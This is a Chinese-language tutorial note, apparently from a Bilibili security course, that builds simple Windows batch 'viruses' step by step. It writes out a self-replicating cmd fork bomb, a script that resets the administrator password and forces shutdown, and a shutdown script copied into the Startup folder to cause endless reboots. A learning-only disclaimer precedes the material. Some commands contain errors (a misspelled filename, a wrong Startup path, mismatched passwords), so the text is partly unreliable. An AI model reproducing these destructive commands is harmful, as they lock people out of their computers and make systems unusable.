声明
学习视频来自B站UP主 泷羽sec,如涉及侵权马上删除文章 笔记的只是方便各位师傅学习知识,以下网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负

---

---

一、Windows-Virus

资源耗尽之无限弹窗cmd-virus测试

将start cmd命令写入到cmd.txt文件中

echo start cmd >cmd.txt

追加>>将%0写入到cmd.txt文件中

echo %0 >> cmd.txt

查看cmd.txt文件内容
type cmd.txt
重命名 cmd.txt文件更改未cmd.bat批处理文件

ren cdm.txt cmd.bat

执行cmd.bat文件

call c:\users\root cmd.bat

锁机virus测试

将net user administrator 123456写入到c:\windows\Temp\virus.bat批处理文件中

echo net user administrator syssys > c:\windows\Temp\text.txt
net user administrator 123456：更改用户administrator的password

将shutdown /s /t /f 0追加写入c:\windows\Temp\text.txt批处理文件中

echo shutdown /s /t /f 0 >> c:\windows\Temp\text.txt

注意：win7没有/n这个参数，这个/n是linux中的
shutdown /n /t 0：直接0s立即执行关闭主机
/n：这个选项是不调用 init 程序进行关机，而是由 shutdown 命令自己直接进行关机。
init 命令是 Unix 和类 Unix 操作系统（如 Linux）中的一个系统级命令，用于初始化系统或改变运行级别。
查看指定路径下的text.txt文件内容

type c:\windows\Temp\text.txt

切换到指定文件路径

cd c:\windows\Temp

重命令文件并更改格式txt为bat

ren text.txt test.bat
dir 查看路径c:\windows\Temp所有目录以及文件

缺点太过明显，需要指定路径才能运行，其次call文件需要等待上一个bat程序执行完才会执行，其次需要管理员权限运行cmd
使用新命令：新建cmd窗口执行bat，也多一个进程

cmd /c c:\windows\Temp\test.bat

这个登录的时候必须是超级管理员用户才会生效，使用其它权限用户依然可以登录，所以理论上成立，实际还需要更改为所有用户才行。

无限重启virus测试

写入立即执行关闭命令到my.bat

echo shutdown /s /t 0 > c:\windows\Temp\my.bat

用是将c:\windows\Temp目录下的my.bat文件复制到当前用户的启动文件夹中，使得每次计算机启动时，my.bat文件都会被执行。

copy c:\windows\Temp\my.bat "%USERPROFILE%\AppData\Roaming\Microsoft\windows\Start\Menu\Programs\Startup\"

开机自启动目录

"%USERPROFILE%\AppData\Roaming\Microsoft\windows\Start\Menu\Programs\Startup\"

重启自动清空缓存测试

c:\windows\Temp\my.bat 

好好好，看来限制是非常多，在win10中首先路径需要正确，其次需要有超级管理员的权限才可以。分享就到这里，下来实践。
还是那句话

实践是检验真理的唯一标准